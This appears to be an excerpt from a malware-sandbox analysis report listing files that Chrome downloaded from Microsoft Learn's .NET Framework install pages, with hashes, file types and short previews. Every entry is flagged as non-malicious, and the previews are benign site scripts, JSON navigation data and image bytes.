                                                                                                                                                                          SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                          MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                          SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):33148
                                                                                                                                                                          Entropy (8bit):4.917595394577667
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                          MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                          SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                          SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                          SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):64291
                                                                                                                                                                          Entropy (8bit):7.964191793580486
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                          MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                          SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                          SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                          SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):64291
                                                                                                                                                                          Entropy (8bit):7.964191793580486
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                          MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                          SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                          SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                          SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                          Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1817143
                                                                                                                                                                          Entropy (8bit):5.501007973622959
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                          MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                          SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1432
                                                                                                                                                                          Entropy (8bit):4.986131881931089
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                          MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                          SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                          SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                          SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1154
                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
